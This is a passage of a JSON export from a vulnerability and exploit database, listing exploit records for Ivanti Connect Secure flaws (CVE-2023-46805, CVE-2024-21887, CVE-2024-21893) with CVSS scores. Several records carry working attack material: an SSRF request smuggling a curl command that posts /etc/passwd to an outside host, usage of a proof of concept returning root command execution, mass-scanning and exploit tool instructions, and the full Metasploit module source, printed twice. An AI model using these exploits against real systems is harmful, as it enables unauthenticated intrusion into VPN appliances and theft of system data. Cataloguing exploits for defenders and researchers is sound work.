"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://github.com/tucommenceapousser/CVE-2024-21887",
"cvelist": [
"CVE-2024-21887"
],
"lastseen": "2024-02-12T15:15:52",
"ai_score": {
"value": 8.2,
"uncertanity": 1.7,
"vector": "NONE"
}
},
{
"id": "1CBA6E14-5A29-5E20-B64D-BA04F0DC2C45",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Improper Authentication in Ivanti Connect Secure",
"description": "19/01/2024 ***** Update *******\nUpdated with the latest info based on Assetnote's blog. \nNow three checks are executed before a status is shown, this also to better detect older versions of Avanti\n\nBlogs with analysis of the CVE:\nhttps://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis\nhttps://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce\n\n# CVE-2023-46805\nSimple scanner for scanning a list of ip-addresses for vulnerable Ivanti Pulse Secure devices\n\n1. Scan a service like Shodan or Censys for the relevant devices and create a list of ip_adresses.\n2. Save them to \"ip_list.txt\" and in the same folder as this script\n3. run the script and it will show output to screen and save to a csv file once finished\n\n",
"published": "2024-01-16T08:05:58",
"modified": "2024-01-30T08:26:45",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/cbeek-r7/CVE-2023-46805",
"cvelist": [
"CVE-2023-46805"
],
"lastseen": "2024-02-12T15:16:56",
"ai_score": {
"value": 9.0,
"uncertanity": 0.2,
"vector": "NONE"
}
},
{
"id": "6506C020-5958-5996-9B02-569C9EF08B42",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Server-Side Request Forgery in Ivanti Connect Secure",
"description": "CVE-2024-21893 is server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n\nrun `python CVE-2024-21893.py -u target.com -a http://xxxxxxxxx.oastify.com`\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/bec33c87-a6c7-4db3-aedc-5749e994c917)\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/c38f93de-379b-4b76-8326-e66c019dfa2a)\n\n### RCE \n\n```\nPOST /dana-ws/saml20.ws HTTP/1.1\nHost: target.com\nAccept: */*\nContent-Type: text/xml\nContent-Length: 934\nConnection: close\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n\t<soap:Body>\n\t\t<ds:Signature\n\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n\t\t\t<ds:SignedInfo>\n\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\n\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\n\t\t\t</ds:SignedInfo>\n\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\n\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n\t\t\t\t<ds:RetrievalMethod URI=\"http://127.0.0.1:8090/api/v1/license/keys-status/%3bcurl%20-X%20POST%20-d%20%40%2fetc%2fpasswd%20http%3a%2f%2f8oxxxxxxxxxxxxx.oastify.com%3b\"/>\n\t\t\t\t<ds:X509Data/>\n\t\t\t</ds:KeyInfo>\n\t\t\t<ds:Object></ds:Object>\n\t\t</ds:Signature>\n\t</soap:Body>\n</soap:Envelope>\n\n```\n\n![image](https://github.com/h4x0r-dz/CVE-2024-21893.py/assets/26070859/e7d7180a-b158-4437-9dd9-97d4c55539c9)\n\n\nReference : https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis \n",
"published": "2024-02-02T22:59:21",
"modified": "2024-02-12T01:28:50",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/h4x0r-dz/CVE-2024-21893.py",
"cvelist": [
"CVE-2024-21893"
],
"lastseen": "2024-02-12T15:13:47",
"ai_score": {
"value": 7.2,
"uncertanity": 2.4,
"vector": "NONE"
}
},
{
"id": "8859BDA5-3AF8-5282-B64F-94D52BB81510",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Improper Authentication in Ivanti Connect Secure",
"description": "\n**Title: Proof of Concept for CVE-2023-46805 - For Educational Use Only**\n\n**License:** This work is placed under the [Creative Commons Attribution 4.0 International License (CC BY 4.0)](https://creativecommons.org/licenses/by/4.0/). You are free to share, copy, distribute, and transmit this work, to adapt it or use it for other purposes, provided the authorship is appropriately attributed.\n\n**Disclaimer:** This Proof of Concept (PoC) is provided for educational and cybersecurity research purposes only. Neither the author, the affiliated organization, nor any other party involved in the creation, production, or delivery of this content will be liable for any damages, including, but not limited to, direct, indirect, incidental, special, consequential, or punitive damages arising from the use or inability to use this content.\n\n**Educational Objective:** This PoC is intended to aid the cybersecurity community in understanding and mitigating the vulnerability identified as CVE-2023-46805. It should not be used in a production environment or for malicious activities.\n\n**Vulnerability Description:** Ivanti RCE\n\n**PoC Details:** \n\n```bash\nUsage of ./CVE-Ivanti:\n -cmd string\n The command to replace 'id' in the payload (default \"id\")\n -t int\n Number of concurrent threads (default 5)\n\n```\n\n```bash\ngo build\necho \"https://1.2.3.4\" | ./CVE-Ivanti\nhttps://1.2.3.4 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\n\ncat myscope.txt -t 5 | ./CVE-Ivanti\nhttps://ssl1.mysite.com:443 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\nhttps://ssl3.mysite.com:443 {\"error\": \"uid=0(root) gid=0(root) groups=0(root)\\n\"}\n\necho \"https://1.2.3.4\" | ./CVE-Ivanti -cmd 'ls /'\n```\n",
"published": "2024-01-25T14:53:16",
"modified": "2024-01-31T02:24:37",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/w2xim3/CVE-2023-46805",
"cvelist": [
"CVE-2023-46805"
],
"lastseen": "2024-02-12T15:14:56",
"ai_score": {
"value": 8.6,
"uncertanity": 0.1,
"vector": "NONE"
}
},
{
"id": "A559D688-3B3F-5C2E-8524-DE9364606561",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Improper Authentication in Ivanti Connect Secure",
"description": "# \ud83d\udea8 CVE-2023-46805 Scanner Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting the CVE-2023-46805 vulnerability in Ivanti Pulse Connect Secure systems. This tool is inspired by the high-signal detection methods developed by AssetNote, focusing on authentication bypass vulnerabilities in these systems.\n\n## \ud83d\udcdd Description\n\nCVE-2023-46805 is a critical vulnerability that allows unauthorized bypass of authentication mechanisms in certain Ivanti Pulse Connect Secure versions. This tool aids in identifying affected systems, leveraging detection techniques based on AssetNote's research. \n\nFor more details on the methodology, see AssetNote's research: [High-Signal Detection and Exploitation of Ivanti\u2019s Pulse Connect Secure Auth Bypass](https://www.assetnote.io/resources/research/high-signal-detection-and-exploitation-of-ivantis-pulse-connect-secure-auth-bypass-rce)\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Focus on a single target for quick assessment.\n- **Bulk Scanning**: Analyze multiple URLs from a file for widespread assessment.\n- **Thread Control**: Customize concurrent scanning with adjustable thread options.\n- **Output Logging**: Save identified potentially vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n - Single URL: `python scanner.py -u <URL>`\n - Bulk scan: `python scanner.py -f <file-path>`\n - With threads: `python scanner.py -f <file-path> -t <number-of-threads>`\n - Save output: `python scanner.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. The author is not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
"published": "2024-01-19T02:23:13",
"modified": "2024-01-23T21:09:42",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH"
}
},
"href": "https://github.com/Chocapikk/CVE-2023-46805",
"cvelist": [
"CVE-2023-46805"
],
"lastseen": "2024-02-12T15:17:24",
"ai_score": {
"value": 7.5,
"uncertanity": 3.0,
"vector": "NONE"
}
},
{
"id": "B529BDE5-C872-5C41-81E2-63068A3535D0",
"type": "githubexploit",
"bulletinFamily": "exploit",
"title": "Exploit for Command Injection in Ivanti Connect Secure",
"description": "# \ud83d\udea8 CVE-2024-21887 Exploit Tool \ud83d\udee0\ufe0f\n\nA robust tool for detecting and exploiting the CVE-2024-21887 vulnerability in Ivanti Connect and Policy Secure systems.\n\n## \ud83d\udcdd Description\n\nCVE-2024-21887 is a critical command injection vulnerability, allowing authenticated admins to execute arbitrary commands. This tool aids in identifying and interacting with affected systems.\n\n## \ud83d\ude80 Features\n\n- **Single URL Scan**: Pinpoint focus on a single target.\n- **Bulk Scanning**: Analyze multiple URLs from a file.\n- **Thread Control**: Customize concurrent scanning with thread options.\n- **Output Logging**: Save identified vulnerable URLs to a file.\n\n## \ud83d\udcda How to Use\n\n1. Install dependencies: `pip install -r requirements.txt`\n2. Run the tool:\n - Single URL: `python exploit.py -u <URL>`\n - Bulk scan: `python exploit.py -f <file-path>`\n - With threads: `python exploit.py -f <file-path> -t <number-of-threads>`\n - Save output: `python exploit.py -f <file-path> -o <output-file-path>`\n\n\u26a0\ufe0f **Disclaimer**: This tool is provided for educational and ethical testing purposes only. I am not responsible for any misuse or damage caused by this tool. Always obtain explicit permission before testing systems that you do not own or have explicit authorization to test.\n",
"published": "2024-01-16T20:59:38",
"modified": "2024-02-12T12:56:01",
"cvss": {
"score": 5.8,
"vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "MULTIPLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8
},
"severity": "MEDIUM",
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://github.com/Chocapikk/CVE-2024-21887",
"cvelist": [
"CVE-2024-21887"
],
"lastseen": "2024-02-12T15:16:47",
"ai_score": {
"value": 8.2,
"uncertanity": 1.7,
"vector": "NONE"
}
},
{
"id": "MSF:EXPLOIT-LINUX-HTTP-IVANTI_CONNECT_SECURE_RCE_CVE_2023_46805-",
"type": "metasploit",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
"description": "This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.\n",
"published": "2024-01-16T14:32:48",
"modified": "2024-01-18T15:35:43",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://www.rapid7.com/db/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805/",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-12T13:24:08",
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',\n 'Description' => %q{\n This module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection\n vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti\n Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and\n 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are\n also vulnerable.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'sfewer-r7', # MSF Exploit & Rapid7 Analysis\n ],\n 'References' => [\n ['CVE', '2023-46805'], # The auth bypass vulnerability.\n ['CVE', '2024-21887'], # The command injection vulnerability.\n ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'],\n ['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/']\n ],\n 'DisclosureDate' => '2024-01-10',\n 'Platform' => %w[linux unix],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true, # Code execution as root.\n 'Targets' => [\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/linux/http/x64/meterpreter/reverse_tcp\n # cmd/linux/http/x64/shell/reverse_tcp\n # cmd/linux/http/x86/shell/reverse_tcp\n 'Linux Command',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_CMD]\n },\n ],\n [\n # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:\n # cmd/unix/python/meterpreter/reverse_tcp\n # cmd/unix/reverse_bash\n # cmd/unix/reverse_python\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => [ARCH_CMD]\n },\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'FETCH_WRITABLE_DIR' => '/tmp'\n },\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n end\n\n def check\n # We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve\n # the target system version information. If this requests succeeds, the target is vulnerable.\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/system-information'\n )\n\n return CheckCode::Unknown('Connection failed') unless res\n\n # If the vendor mitigation has been applied, the request will return 403 Forbidden.\n return CheckCode::Safe if res.code != 200\n\n # By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON\n # response, this is only for display purposes, we don't need to test the version information.\n\n json_data = res.get_json_document\n\n name = json_data.dig('software-inventory', 'software', 'name')\n\n version = json_data.dig('software-inventory', 'software', 'version')\n\n build = json_data.dig('software-inventory', 'software', 'build')\n\n # Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if\n # get_json_document could not parse the JSON (and will return an empty Hash).\n return CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil?\n\n Exploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\")\n end\n\n def exploit\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection',\n 'ctype' => 'application/json',\n 'data' => {\n 'type' => \";#{payload.encoded} #\",\n 'txtGCPProject' => Rex::Text.rand_text_alpha(8),\n 'txtGCPSecret' => Rex::Text.rand_text_alpha(8),\n 'txtGCPPath' => Rex::Text.rand_text_alpha(8),\n 'txtGCPBucket' => Rex::Text.rand_text_alpha(8)\n }.to_json\n )\n end\nend\n",
"ai_score": {
"value": 8.8,
"uncertanity": 2.2,
"vector": "NONE"
}
},
{
"id": "PACKETSTORM:176668",
"type": "packetstorm",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Unauthenticated Remote Code Execution",
"description": "",
"published": "2024-01-22T00:00:00",
"modified": "2024-01-22T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-01-22T16:02:50",
"sourceHref": "https://packetstormsecurity.com/files/download/176668/ivanti_connect_secure_rce_cve_2023_46805.rb.txt",
"sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThis module chains an authentication bypass vulnerability (CVE-2023-46805) and a command injection \nvulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti \nPolicy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and \n22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are \nalso vulnerable. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'sfewer-r7', # MSF Exploit & Rapid7 Analysis \n], \n'References' => [ \n['CVE', '2023-46805'], # The auth bypass vulnerability. \n['CVE', '2024-21887'], # The command injection vulnerability. \n['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'], \n['URL', 'https://labs.watchtowr.com/welcome-to-2024-the-sslvpn-chaos-continues-ivanti-cve-2023-46805-cve-2024-21887/'] \n], \n'DisclosureDate' => '2024-01-10', \n'Platform' => %w[linux unix], \n'Arch' => [ARCH_CMD], \n'Privileged' => true, # Code execution as root. \n'Targets' => [ \n[ \n# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: \n# cmd/linux/http/x64/meterpreter/reverse_tcp \n# cmd/linux/http/x64/shell/reverse_tcp \n# cmd/linux/http/x86/shell/reverse_tcp \n'Linux Command', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_CMD] \n}, \n], \n[ \n# Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: \n# cmd/unix/python/meterpreter/reverse_tcp \n# cmd/unix/reverse_bash \n# cmd/unix/reverse_python \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => [ARCH_CMD] \n}, \n] \n], \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'FETCH_WRITABLE_DIR' => '/tmp' \n}, \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \nend \n \ndef check \n# We leverage the auth bypass to request the authenticated endpoint /api/v1/system/system-information and retrieve \n# the target system version information. If this requests succeeds, the target is vulnerable. \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => '/api/v1/totp/user-backup-code/../../system/system-information' \n) \n \nreturn CheckCode::Unknown('Connection failed') unless res \n \n# If the vendor mitigation has been applied, the request will return 403 Forbidden. \nreturn CheckCode::Safe if res.code != 200 \n \n# By here we know the target is vulnerable, we can pull out the exact version information from the expected JSON \n# response, this is only for display purposes, we don't need to test the version information. \n \njson_data = res.get_json_document \n \nname = json_data.dig('software-inventory', 'software', 'name') \n \nversion = json_data.dig('software-inventory', 'software', 'version') \n \nbuild = json_data.dig('software-inventory', 'software', 'build') \n \n# Return CheckCode::Unknown if we got a JSON response but it didn't contain the expected keys, or if \n# get_json_document could not parse the JSON (and will return an empty Hash). \nreturn CheckCode::Unknown('No version information in response') if name.nil? || version.nil? || build.nil? \n \nExploit::CheckCode::Vulnerable(\"#{name} #{version} (#{build})\") \nend \n \ndef exploit \nsend_request_cgi( \n'method' => 'POST', \n'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection', \n'ctype' => 'application/json', \n'data' => { \n'type' => \";#{payload.encoded} #\", \n'txtGCPProject' => Rex::Text.rand_text_alpha(8), \n'txtGCPSecret' => Rex::Text.rand_text_alpha(8), \n'txtGCPPath' => Rex::Text.rand_text_alpha(8), \n'txtGCPBucket' => Rex::Text.rand_text_alpha(8) \n}.to_json \n) \nend \nend \n`\n",
"ai_score": {
"value": 7.4,
"uncertanity": 1.9,
"vector": "NONE"
}
},
{
"id": "SAINT:023354DDA8BBB4879D8A5440380C03C9",
"type": "saint",
"bulletinFamily": "exploit",
"title": "Ivanti Connect Secure Server-Side Request Forgery",
"description": "Added: 02/05/2024 \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nA server-side request forgery vulnerability in the SAML component allows attackers to access restricted resources without authentication. This can lead to remote command execution when chained with other vulnerabilities. \n\n### Resolution\n\nApply the appropriate patch referenced in the [Ivanti Security Advisory](<https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure>). \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure> \n\n\n### Platforms\n\nLinux \n \n\n",
"published": "2024-02-05T00:00:00",
"modified": "2024-02-05T00:00:00",
"cvss": {
"score": 6.5,
"vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "SINGLE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
